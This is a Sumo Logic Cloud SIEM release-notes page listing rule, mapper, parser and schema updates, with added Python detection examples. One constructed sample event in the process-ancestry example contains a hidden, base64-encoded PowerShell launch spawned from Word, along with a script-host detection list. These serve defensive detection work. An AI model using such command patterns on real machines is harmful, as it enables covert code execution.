  • [Updated] THRESHOLD-S00048 Outbound Traffic to Countries Outside the United States
  • [Updated] MATCH-S00546 Potential Reconnaissance Obfuscation
  • [Updated] LEGACY-S00080 SSH Interesting Hostname Login
  • [Updated] LEGACY-S00170 The Audit Log was Cleared - 1102
  • [Updated] MATCH-S01024 Threat Intel - Destination IP Address (High Confidence)
  • [Updated] MATCH-S01026 Threat Intel - Destination IP Address (Low Confidence)
  • [Updated] MATCH-S01028 Threat Intel - Destination IP Address (Medium Confidence)
  • [Updated] MATCH-S01023 Threat Intel - Inbound Traffic from Threat Feed IP (High Confidence)
  • [Updated] MATCH-S01025 Threat Intel - Inbound Traffic from Threat Feed IP (Low Confidence)
  • [Updated] MATCH-S01027 Threat Intel - Inbound Traffic from Threat Feed IP (Medium Confidence)
  • [Updated] MATCH-S00531 Unload Sysmon Filter Driver
  • [Updated] MATCH-S00892 Value Added to Azure NSG Group
  • [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line
  • [Updated] MATCH-S00549 Windows Disable Antispyware Registry
  • [Updated] MATCH-S00538 Windows Firewall Rule Added
  • [Updated] MATCH-S00537 Windows Firewall Rule Deleted
  • [Updated] MATCH-S00536 Windows Firewall Rule Modified
  • [Updated] MATCH-S00533 Windows Security Account Manager Stopped

Log Mappers

  • [Deleted] Fortinet DNS Query
  • [Deleted] Fortinet Traffic2
  • [Deleted] Fortinet dns Logs
  • [New] Citrix Cloud Session Logs
  • [Updated] Fortinet Anomaly Logs
  • [Updated] Fortinet Appctrl1
  • [Updated] Fortinet Appctrl2
  • [Updated] Fortinet Authentication
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet DNS
  • [Updated] Fortinet Endpoint
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet FortiGate-200D Auth CEF
  • [Updated] Fortinet FortiGate-200D Endpoint CEF
  • [Updated] Fortinet FortiGate-200D Flow CEF
  • [Updated] Fortinet Traffic
  • [Updated] Fortinet UTM IDS1
  • [Updated] Fortinet VPN
  • [Updated] Fortinet Virus
  • [Updated] Fortinet ha Logs
  • [Updated] Fortinet perf-stats pba-close Systems Logs
  • [Updated] Fortinet security-rating Logs
  • [Updated] Fortinet ssl Logs
  • [Updated] Fortinet voip Logs
  • [Updated] Fortinet wad Logs
  • [Updated] Fortinet waf Logs
  • [Updated] Fortinet wireless Logs
  • [Updated] Linux-Sysmon/Operational - 1
  • [Updated] Linux-Sysmon/Operational - 10
  • [Updated] Linux-Sysmon/Operational - 15
  • [Updated] Linux-Sysmon/Operational - 16
  • [Updated] Linux-Sysmon/Operational - 17
  • [Updated] Linux-Sysmon/Operational - 18
  • [Updated] Linux-Sysmon/Operational - 2
  • [Updated] Linux-Sysmon/Operational - 23
  • [Updated] Linux-Sysmon/Operational - 3
  • [Updated] Linux-Sysmon/Operational - 4
  • [Updated] Linux-Sysmon/Operational - 5
  • [Updated] Linux-Sysmon/Operational - 6
  • [Updated] Linux-Sysmon/Operational - 7
  • [Updated] Linux-Sysmon/Operational - 8
  • [Updated] Linux-Sysmon/Operational - 9
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 1
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 10
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 15
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 16
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 17
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 18
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 19|20
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 2
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 21
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 22
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 23
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 24
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 25
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 26
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 27
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 28
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 3
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 4
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 5
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 6
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 7
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 8
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 9
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 29

Parsers

  • [Updated] /Parsers/System/Citrix/Citrix Cloud C2C

Schema

  • [Updated] MITRE ATT&CK Tactics & Techniques to v19

April 10th, 2026 - Content Release

Note: In upcoming content releases, we will be addressing field mapping redundancies involving the following fields: device_hostname, device_ip, srcDevice_hostname, and srcDevice_ip. Currently, these normalized fields are sometimes derived from the same input source, leading to duplication.

The updates will streamline and standardize these mappings across the following product mappers, as well as any rules that generate signals from their records:

  • AWS CloudTrail
  • Cisco Umbrella
  • Fortinet FortiGate
  • Jamf
  • Microsoft Office 365
  • Microsoft Windows
  • Okta
  • Suricata

These refinements will help ensure consistent and efficient data normalization across supported sources.
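A practitioner preparing for this change will want two checks: which mappers currently feed two normalized fields from one source field, and which custom rules reference only the field that may stop being populated. The script below is an added example for this page, not Sumo Logic tooling. Mappers are represented as constructed lists of (normalized_field, source_field) pairs and rules as constructed expression strings in a Cloud SIEM-like syntax; which of the two redundant fields a given mapper keeps after the cleanup is an assumption (srcDevice_* is assumed to survive), so treat the "dropped" and "kept" arguments as parameters to set per mapper.

```python
"""Audit field mappings for normalized fields fed from one source field.

Added example for this page; it is not Sumo Logic tooling. A mapper is
represented here as a constructed list of (normalized_field, source_field)
pairs, and rules as constructed expression strings in a Cloud SIEM-like
syntax. Which of the two redundant fields a given mapper keeps after the
cleanup is an assumption (srcDevice_* is assumed to be the surviving field).
"""
import re
from collections import defaultdict

# Constructed sample mappers: the first maps device_ip and srcDevice_ip from the
# same raw field (the redundancy the note describes); the second is cleaned up.
SAMPLE_MAPPERS = {
    "CloudTrail (before)": [
        ("srcDevice_ip", "sourceIPAddress"),
        ("device_ip", "sourceIPAddress"),
        ("user_username", "userIdentity.userName"),
    ],
    "CloudTrail (after)": [
        ("srcDevice_ip", "sourceIPAddress"),
        ("user_username", "userIdentity.userName"),
    ],
}

# Constructed custom rule expressions; CUSTOM-001 relies on device_ip alone.
SAMPLE_RULES = {
    "CUSTOM-001": 'metadata_vendor = "AWS" AND device_ip = "198.51.100.7"',
    "CUSTOM-002": 'metadata_vendor = "AWS" AND srcDevice_ip = "198.51.100.7"',
    "CUSTOM-003": 'device_hostname = "bastion" AND srcDevice_hostname IS NOT NULL',
}

# The four schema fields named in the note above.
ENTITY_FIELD = re.compile(r"\b(?:srcDevice|device)_(?:ip|hostname)\b")


def find_redundant_mappings(mapper):
    """Return {source_field: [normalized_fields]} for every source field that
    feeds more than one normalized field."""
    by_source = defaultdict(list)
    for normalized, source in mapper:
        by_source[source].append(normalized)
    return {src: fields for src, fields in by_source.items() if len(fields) > 1}


def rules_at_risk(rules, dropped_field, kept_field):
    """Rule IDs whose expression references dropped_field but never kept_field.

    Such a rule stops matching once dropped_field is no longer populated from
    the shared source, because nothing else in the expression carries the value."""
    hits = []
    for rule_id, expr in rules.items():
        referenced = set(ENTITY_FIELD.findall(expr))
        if dropped_field in referenced and kept_field not in referenced:
            hits.append(rule_id)
    return sorted(hits)


if __name__ == "__main__":
    for name, mapper in SAMPLE_MAPPERS.items():
        print(name, find_redundant_mappings(mapper))
    print("rules to review:", rules_at_risk(SAMPLE_RULES, "device_ip", "srcDevice_ip"))
```

Run the second check once per affected product mapper, with the dropped/kept pair set to whatever that mapper ends up keeping; a rule that names both fields (CUSTOM-003 above) keeps working whichever side is removed.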

This content release includes:

  • New AWS Bedrock audit logging to track knowledge base deletion events.
  • Enhanced field mappings and parsing for Netskope security events, improving username extraction, threat categorization, and anomaly detection across 14 log mappers.
  • Updated Microsoft Exchange Message Trace mapper and parser to support Graph API log format with improved email tracking and user identification.
  • Expanded AWS CloudWatch and IAM logging with improved identity field mapping, timestamp parsing, and resource tracking.
  • Parser enhancements for Imperva Incapsula (cslabel field support) and Infoblox (new log format support).
  • New schema fields for grandparent process tracking to improve visibility into process execution chains.

Additional changes are enumerated below.

Log Mappers

  • [New] CloudTrail - bedrock.amazonaws.com - DeleteKnowledgeBase
  • [Updated] AWS CloudWatch Custom
  • [Updated] CloudTrail - iam.amazonaws.com - Policy Change
  • [Updated] Microsoft O365 Exchange Message Trace C2C
  • [Updated] Netskope - Alerts
  • [Updated] Netskope - Anomaly - Bulk Download
  • [Updated] Netskope - Anomaly - User Shared Credentials
  • [Updated] Netskope - Application Events
  • [Updated] Netskope - Audit Authentication Events - Logoff
  • [Updated] Netskope - Audit Authentication Events - Logon
  • [Updated] Netskope - Audit Events
  • [Updated] Netskope - Catch All
  • [Updated] Netskope - DLP Alerts
  • [Updated] Netskope - Incidents
  • [Updated] Netskope - Network Events
  • [Updated] Netskope - Page Events
  • [Updated] Netskope - nspolicy

Parsers

  • [Updated] /Parsers/System/AWS/AWS CloudWatch
  • [Updated] /Parsers/System/Imperva/Imperva Incapsula
  • [Updated] /Parsers/System/Infoblox/Infoblox
  • [Updated] /Parsers/System/Netskope/Netskope Security Cloud JSON
  • [Updated] /Parsers/System/Microsoft/O365 Exchange Message Trace C2C

Schema

  • [New] grandparentBaseImage
  • [New] grandparentCommandLine
  • [New] grandparentPid
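To show what the three grandparent fields buy a detection author, here is an added example (not the Cloud SIEM mapper) that joins process-creation events to their ancestors and then compares a parent-only rule with one that also looks one hop further up. It assumes each record carries host, pid, ppid, image path and command line, as a Sysmon event ID 1 record does; the field names other than grandparentBaseImage, grandparentCommandLine and grandparentPid are assumed for illustration, and the events are constructed.

```python
"""Populate parent and grandparent process fields from process-creation events.

Added example; it is not the Cloud SIEM mapper. It assumes each
process-creation record carries host, pid, ppid, image and command line (as a
Sysmon event ID 1 record does) and joins each record to its ancestors on the
same host. Field names other than grandparentBaseImage, grandparentCommandLine
and grandparentPid are assumed for illustration. Events are constructed.
"""

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}

# Constructed chain: explorer.exe -> WINWORD.EXE -> cmd.exe -> powershell.exe
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 400, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"host": "ws01", "pid": 1200, "ppid": 400,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" /n invoice.docm'},
    {"host": "ws01", "pid": 1337, "ppid": 1200,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA..."},
    {"host": "ws01", "pid": 1400, "ppid": 1337,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -enc SQBFAFgA..."},
]


def base_image(path):
    """File name portion of an image path (Windows or POSIX separators)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def enrich_with_ancestry(events):
    """Join each event to its parent and grandparent on (host, pid).

    Ancestors that were not observed (e.g. a ppid of 1) leave the
    corresponding fields as None rather than guessing."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    records = []
    for e in events:
        parent = by_key.get((e["host"], e["ppid"]))
        grandparent = by_key.get((e["host"], parent["ppid"])) if parent else None
        records.append({
            "device_hostname": e["host"],
            "pid": e["pid"],
            "baseImage": base_image(e["image"]),
            "commandLine": e["cmd"],
            "parentPid": e["ppid"],
            "parentBaseImage": base_image(parent["image"]) if parent else None,
            "grandparentPid": parent["ppid"] if parent else None,
            "grandparentBaseImage": base_image(grandparent["image"]) if grandparent else None,
            "grandparentCommandLine": grandparent["cmd"] if grandparent else None,
        })
    return records


def parent_only_hits(records):
    """Script host spawned directly by an Office application."""
    return [r["pid"] for r in records
            if r["baseImage"] in SCRIPT_HOSTS and r["parentBaseImage"] in OFFICE_APPS]


def ancestry_hits(records):
    """Script host with an Office application as parent or grandparent; this
    also catches the cmd.exe hop that hides the Office parent from the
    parent-only logic."""
    return [r["pid"] for r in records
            if r["baseImage"] in SCRIPT_HOSTS
            and (r["parentBaseImage"] in OFFICE_APPS
                 or r["grandparentBaseImage"] in OFFICE_APPS)]


if __name__ == "__main__":
    recs = enrich_with_ancestry(SAMPLE_EVENTS)
    print("parent-only:", parent_only_hits(recs))
    print("with grandparent:", ancestry_hits(recs))
```

On the constructed chain the parent-only rule sees only cmd.exe under WINWORD.EXE; the powershell.exe launched through that cmd.exe hop is only attributable to the document once the grandparent fields are populated, and grandparentCommandLine preserves the document name that started the chain.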

March 26th, 2026 - Content Release

This content release includes:

  • New support for Proofpoint TRAP threat response and Teleport access management.
  • Improved Fortinet traffic visibility with additional byte count field mappings across application control, traffic, and web filter logs.
  • Enhanced Microsoft Office 365 authentication event normalization for action and cause fields.
  • Infoblox DHCP log parsing improvements for broader log format coverage.

Additional changes are enumerated below.

Log Mappers

  • [New] Proofpoint TRAP Default Mapping
  • [New] Teleport Authentication
  • [New] Teleport Default
  • [Updated] Fortinet Appctrl1
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Traffic1
  • [Updated] Fortinet Traffic2
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers

  • [New] /Parsers/System/Proofpoint/Proofpoint TRAP
  • [New] /Parsers/System/Teleport/Teleport
  • [Updated] /Parsers/System/Infoblox/Infoblox

March 12th, 2026 - Content Release

This content release includes:

  • New Cloudflare DNS event visibility with a dedicated log mapper and enhanced parser support for DNS query logging.
  • Improved Infoblox DHCP event handling with updated field mappings and additional timestamp format support.
  • Refined detection logic for Office 365 MailItemsAccessed events. Now using global baselines for more accurate first-seen analysis.
  • Performance optimization for Windows critical service monitoring rule.

Additional changes are enumerated below.

Rules

  • [Updated] FIRST-S00044 First Seen AppID Generating MailItemsAccessed Event from User
  • [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line
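The change to FIRST-S00044 above swaps a per-user baseline for a global one. The following added example (not the rule's actual expression) shows the difference on constructed MailItemsAccessed-like records reduced to (date, user, AppId), with an assumed fixed cutoff separating baseline from detection; the real rule's baseline window and retention are not described on this page.

```python
"""First-seen analysis with a per-user baseline versus a global baseline.

Added example; this is not the FIRST-S00044 rule expression. It assumes
MailItemsAccessed-like records reduced to (date, user, AppId) and a fixed
baseline cutoff date; the rule's real baseline window and retention are not
described on this page. Events are constructed.
"""

# Constructed events (date, user, AppId). Everything before CUTOFF is baseline.
SAMPLE_EVENTS = [
    ("2026-03-01", "alice", "app-outlook"),
    ("2026-03-01", "bob", "app-outlook"),
    ("2026-03-02", "alice", "app-mobile"),
    ("2026-03-11", "carol", "app-outlook"),   # known app, new user
    ("2026-03-11", "carol", "app-unknown"),   # app never seen in the tenant
    ("2026-03-12", "dave", "app-unknown"),    # same new app, second user
]
CUTOFF = "2026-03-10"


def first_seen(events, cutoff, scope):
    """Return (user, app) pairs first seen at or after cutoff.

    scope="user":   baseline key is (user, app); each user's first use of an
                    app fires, even for apps common elsewhere in the tenant.
    scope="global": baseline key is the app alone; only an app new to the
                    whole tenant fires, and it fires once."""
    if scope not in ("user", "global"):
        raise ValueError("scope must be 'user' or 'global'")
    key = (lambda u, a: (u, a)) if scope == "user" else (lambda u, a: a)
    # Baseline: everything observed before the cutoff.
    seen = {key(u, a) for ts, u, a in events if ts < cutoff}
    flagged = []
    for ts, u, a in sorted(events):
        if ts < cutoff:
            continue
        k = key(u, a)
        if k not in seen:
            flagged.append((u, a))
            seen.add(k)   # later occurrences are no longer "first seen"
    return flagged


if __name__ == "__main__":
    print("per-user:", first_seen(SAMPLE_EVENTS, CUTOFF, "user"))
    print("global:  ", first_seen(SAMPLE_EVENTS, CUTOFF, "global"))
```

The global baseline removes the signal for carol's first use of an app the rest of the tenant already uses, which is the noise a per-user baseline produces every time a known mail client reaches a new mailbox; the trade-off is that it no longer fires when one user starts using an app that is common elsewhere, so per-user context has to come from another rule if it is needed.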

Log Mappers

  • [New] Cloudflare - DNS Events
  • [Updated] Infoblox DDI - DHCP

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Cloudflare/Cloudflare Logpush
  • [Updated] /Parsers/System/Infoblox/Infoblox
  • [Updated] /Parsers/System/Linux/Linux OS Syslog

February 24th, 2026 - Content Release

This content release includes:

  • Added MITRE ATLAS Tactics and Techniques to tag schema for improved attack pattern classification and detection rule development.
  • Expanded Ubiquiti Unifi network visibility with 7 new log mappers and parser enhancements covering process execution, DHCP events, DNS queries, and general network traffic.
  • Enhanced field mappings and parsing for email security, web traffic analysis, and authentication monitoring:
    • Abnormal Security threat detection now captures email metadata, sender/recipient details, and threat categorization.
    • Netskope web transactions include network connection details, file hashes, and error context.
    • Okta Active Directory authentication events provide standardized user identification.

Additional changes are enumerated below.

Log Mappers

  • [New] Unifi - Process Cron - Command Execution
  • [New] Unifi - Process sudo - Superuser Do Command Execution
  • [New] Unifi DHCP ACK Event
  • [New] Unifi DHCP Offer Event
  • [New] Unifi DHCP Request and DHCP DISCOVER Event
  • [New] Unifi DNS Network Event
  • [New] Unifi Network Event
  • [Updated] Abnormal Security Threats
  • [Updated] Netskope - WebTx Events
  • [Updated] Okta Authentication - auth_via_AD_agent
  • [Updated] Unifi Catch All
  • [Updated] Unifi HTTP Request Logs

Parsers

  • [Updated] /Parsers/System/Abnormal Security/Abnormal Security
  • [Updated] /Parsers/System/Netskope/Netskope WebTx
  • [Updated] /Parsers/System/Okta/Okta
  • [Updated] /Parsers/System/Ubiquiti/Ubiquiti Unifi

February 18, 2026 - Application Update

Bulk update insights

You can now use the UI or API to update multiple insights at a time: close, reassign, comment on, or change the status of several insights in one action, which speeds up insight resolution.

February 9th, 2026 - Content Release

This content release includes:

  • New support for OpenAI and Anthropic Claude Code audit logging to monitor AI platform usage, API key lifecycle, and organizational access.
  • New support for Akamai Noname API Security threat detection and analysis.
  • Enhanced CrowdStrike Falcon detection coverage including XDR events, automated lead summaries, and data protection alerts.
  • Standardized device IP field mappings across Cisco ASA log mappers for improved asset correlation.

Additional changes are enumerated below.

Rules

  • [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line. Updated detection expression for improved query performance.

Log Mappers

  • [New] Akamai Noname API Security Insight Log
  • [New] Anthropic Claude Code - api_request|api_error|user_prompt|tool_result|tool_decision
  • [New] Anthropic Claude Code Catch All
  • [New] CrowdStrike Alert - All Detections
  • [New] CrowdStrike Falcon - AutomatedLeadSummaryEvent|XdrDetectionSummaryEvent
  • [New] CrowdStrike Falcon - DataProtectionDetectionSummaryEvent
  • [New] OpenAI Audit - API Key Events
  • [New] OpenAI Audit - Invite Events
  • [New] OpenAI Audit - Login Events
  • [New] OpenAI Audit - Organization Events
  • [New] OpenAI Audit - Project Events
  • [New] OpenAI Audit - Role Assignment Events
  • [New] OpenAI Audit - Role Events
  • [New] OpenAI Audit - Service Account Events
  • [New] OpenAI Audit - User Management Events
  • [New] OpenAI Audit - Workflow Events
  • [New] OpenAI Audit Catch All
  • [Updated] Cisco ASA 106001 JSON
  • [Updated] Cisco ASA 106102-3 JSON
  • [Updated] Cisco ASA 109201|109207|113022
  • [Updated] Cisco ASA 4180(18|19|44)
  • [Updated] Cisco ASA 609002 JSON
  • [Updated] Cisco ASA 713172 JSON
  • [Updated] Cisco ASA 713nnn JSON
  • [Updated] Cisco ASA 716039 JSON
  • [Updated] Cisco ASA 716059 JSON
  • [Updated] Cisco ASA 725016|771002
  • [Updated] Cisco ASA 733100|734001|737005|737017|737036|737029|746014|746015|746016 JSON
  • [Updated] Cisco Umbrella DNS Logs
  • [Updated] Unifi HTTP Request Logs

Parsers

  • [New] /Parsers/System/Akamai/Noname API Security
  • [New] /Parsers/System/Anthropic/Claude Code
  • [New] /Parsers/System/OpenAI/OpenAI Audit
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON

January 23rd, 2026 - Content Release

This content release includes:

  • New parsing and mapping support for Ubiquiti Unifi.
  • Updates to Infoblox DDI and NIOS log mappers and parsers to extract and map hostname, IP, port, and MAC address fields.
  • Updates to Check Point Firewall Syslog parser to improve user extraction.
  • Update to Netskope Security Cloud JSON parser to add a static alert name in the absence of specific alert name data.

Log Mappers

  • [New] Unifi Catch All
  • [New] Unifi Http Request Logs
  • [New] Unifi Traffic Logs
  • [Updated] Infoblox DDI - Catch All
  • [Updated] Infoblox DDI - DHCP
  • [Updated] Infoblox DDI - DNS
  • [Updated] Infoblox NIOS - Catch All
  • [Updated] Infoblox NIOS - DHCP
  • [Updated] Infoblox NIOS - DNS

Parsers

  • [New] /Parsers/System/Ubiquiti/Ubiquiti Unifi
  • [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
  • [Updated] /Parsers/System/Infoblox/Infoblox
  • [Updated] /Parsers/System/Netskope/Netskope Security Cloud JSON

January 15th, 2026 - Content Release

This release adds support for OCSF 1.6 and Netskope WebTx logs. Changes are enumerated below.

Rules

  • [New] MATCH-S01148 OCSF IAM Analysis Finding
    • Passes through IAM analysis findings from OCSF conforming sources.
  • [Updated] MATCH-S00445 Known Ransomware File Extensions
    • Corrects spelling in rule description.

Log Mappers

  • [Updated] Netskope - WebTx Events

Parsers

  • [New] /Parsers/System/Netskope/Netskope WebTx

January 9th, 2026 - Content Release

This content release includes:

  • Update to the Okta first-seen OIDC token grant rule (FIRST-S00067).
  • New parsing and mapping support for VMware vSphere Web Services.
  • Updates to Fortinet parsing and mapping to better capture inbound and outbound traffic bytes and packets.
  • Updates to Okta mapping to standardize srcDevice_ip mappings.

Changes are enumerated below.

Rules

  • [Updated] FIRST-S00067 Okta - First Seen Client ID/ASN combo in successful OIDC token grant
    • Added exclusion to rule expression to exclude consideration of null values in baseline.

Log Mappers

  • [New] Check Point Anti Malware
  • [New] Check Point New Anti Virus
  • [New] vSphere Web Services - Login/Logout
  • [New] vSphere Web Services - default
  • [Updated] Cisco ASA 722051|722022|722023|722028|722032|722033|722036|722037|722041|722011
    • Update to parser and mapper to correctly capture IP directionality.
  • [Updated] Fortinet Appctrl1
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Traffic Syslog 1
  • [Updated] Fortinet Traffic1
  • [Updated] Fortinet Traffic2
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Okta Authentication - auth_via_AD_agent
  • [Updated] Okta Authentication - auth_via_mfa
  • [Updated] Okta Authentication - auth_via_radius
  • [Updated] Okta Authentication - sso
  • [Updated] Okta Authentication Events
  • [Updated] Okta Catch All
  • [Updated] Okta Security Threat Events
  • [Updated] Oracle Cloud Infrastructure Audit Catch All
    • Update to mapper to correctly capture source IP address.

Parsers

  • [New] /Parsers/System/VMware/vSphere Web Services
  • [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-JSON

Copyright © 2026 by Sumo Logic, Inc.